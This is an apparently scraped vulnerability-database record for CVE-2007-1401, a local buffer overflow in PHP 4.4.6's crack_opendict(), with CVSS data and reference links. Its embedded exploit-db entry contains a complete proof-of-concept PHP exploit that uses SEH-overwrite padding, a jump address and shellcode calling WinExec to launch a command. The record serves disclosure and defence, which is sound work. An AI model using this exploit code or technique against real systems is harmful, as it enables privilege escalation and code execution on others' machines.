ID OSVDB:35043
Type osvdb
Reporter OSVDB
Modified 2007-03-08T22:10:25
Description
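No description provided by the source. Per the CVE-2007-1401 entry referenced below, this is a buffer overflow in the crack extension (CrackLib) bundled with PHP 4.4.6 and other versions before 5.0.0: a long argument to crack_opendict() might allow local users to gain privileges (CVSS 6.9, AV:L/AC:M/Au:N/C:C/I:C/A:C). The function belongs to the crack extension, so exposure presumably depends on that extension being loaded.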
References:
Vendor URL: http://www.php.net/
Other Advisory URL: http://retrogod.altervista.org/php_446_crack_opendict_local_bof.html
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-03/0043.html
Generic Exploit URL: http://www.milw0rm.com/exploits/3431
CVE-2007-1401
{"bulletinFamily": "software", "viewCount": 3, "reporter": "OSVDB", "references": [], "description": "# No description provided by the source\n\n## References:\nVendor URL: http://www.php.net/\nOther Advisory URL: http://retrogod.altervista.org/php_446_crack_opendict_local_bof.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-03/0043.html\nGeneric Exploit URL: http://www.milw0rm.com/exploits/3431\n[CVE-2007-1401](https://vulners.com/cve/CVE-2007-1401)\n", "affectedSoftware": [], "hashmap": [{"key": "affectedSoftware", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "7df8a3ecf52a0d7e2f2ddcf4fad22ee4"}, {"key": "cvss", "hash": "e8bafdc9ad5c6f47fe1e6e5fd509b7a9"}, {"key": "description", "hash": "8560ffba1df02e17dcc8fb300556ee42"}, {"key": "href", "hash": "fc853048755b400157fe13036b193e8c"}, {"key": "modified", "hash": "a9ba1cf72b29a34fbc99a38da10795a4"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "a9ba1cf72b29a34fbc99a38da10795a4"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "955b328dc7cd615c13af5464c9183464"}, {"key": "title", "hash": "22d59c078c1d177ee09ee90c29f92aed"}, {"key": "type", "hash": "1327ac71f7914948578f08c54f772b10"}], "href": "https://vulners.com/osvdb/OSVDB:35043", "modified": "2007-03-08T22:10:25", "objectVersion": "1.2", "enchantments": {"score": {"value": 7.0, "vector": "NONE", "modified": "2017-04-28T13:20:31"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-1401"]}, {"type": "exploitdb", "idList": ["EDB-ID:3431"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:7364"]}], "modified": "2017-04-28T13:20:31"}, "vulnersScore": 7.0}, "id": "OSVDB:35043", "title": "PHP Cracklib crack_opendict() Function Local Overflow", "hash": "0092cb0e77be3c593988fa71f28ce32988e71ddd2d0fb02212c9310b6086e2a6", 
"edition": 1, "published": "2007-03-08T22:10:25", "type": "osvdb", "history": [], "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvelist": ["CVE-2007-1401"], "lastseen": "2017-04-28T13:20:31"}
{"cve": [{"lastseen": "2019-05-29T18:08:58", "bulletinFamily": "NVD", "description": "Buffer overflow in the crack extension (CrackLib), as bundled with PHP 4.4.6 and other versions before 5.0.0, might allow local users to gain privileges via a long argument to the crack_opendict function.", "modified": "2018-10-16T16:38:00", "id": "CVE-2007-1401", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-1401", "published": "2007-03-10T22:19:00", "title": "CVE-2007-1401", "type": "cve", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:24", "bulletinFamily": "software", "description": "Buffer overflow on oversized function argument.", "modified": "2007-03-09T00:00:00", "published": "2007-03-09T00:00:00", "id": "SECURITYVULNS:VULN:7364", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7364", "title": "PHP crack_opendict() extension buffer overflow", "type": "securityvulns", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-01-31T18:28:24", "bulletinFamily": "exploit", "description": "PHP 4.4.6 crack_opendict() Local Buffer Overflow Exploit PoC. CVE-2007-1401. Local exploit for windows platform", "modified": "2007-03-08T00:00:00", "published": "2007-03-08T00:00:00", "id": "EDB-ID:3431", "href": "https://www.exploit-db.com/exploits/3431/", "type": "exploitdb", "title": "PHP 4.4.6 crack_opendict Local Buffer Overflow Exploit PoC", "sourceData": "<?php\n//PHP 4.4.6 crack_opendict() local buffer overflow poc exploit\n//win2k sp3 version / seh overwrite method\n//to be launched from the cli\n\n// by rgod\n// site: http://retrogod.altervista.org\n\nif (!extension_loaded(\"crack\")){\ndie(\"you need the crack extension loaded.\");\n}\n\n$____scode=\n\"\\xeb\\x1b\".\n\"\\x5b\".\n\"\\x31\\xc0\".\n\"\\x50\".\n\"\\x31\\xc0\".\n\"\\x88\\x43\\x59\".\n\"\\x53\".\n\"\\xbb\\xca\\x73\\xe9\\x77\". 
//WinExec\n\"\\xff\\xd3\".\n\"\\x31\\xc0\".\n\"\\x50\".\n\"\\xbb\\x5c\\xcf\\xe9\\x77\". //ExitProcess\n\"\\xff\\xd3\".\n\"\\xe8\\xe0\\xff\\xff\\xff\".\n\"\\x63\\x6d\\x64\".\n\"\\x2e\".\n\"\\x65\".\n\"\\x78\\x65\".\n\"\\x20\\x2f\".\n\"\\x63\\x20\".\n\"start notepad & \";\n\n$jmp=\"\\xeb\\x06\\x06\\xeb\"; // jmp short\n$eip=\"\\x86\\xa0\\xf8\\x77\"; // call ebx, ntdll.dll\n$____suntzu.=str_repeat(\"A\",3216);\n$____suntzu.=$jmp.$eip.str_repeat(\"\\x90\",12).$____scode;\ncrack_opendict($____suntzu);\n\n?>\n\n# milw0rm.com [2007-03-08]\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/3431/"}]}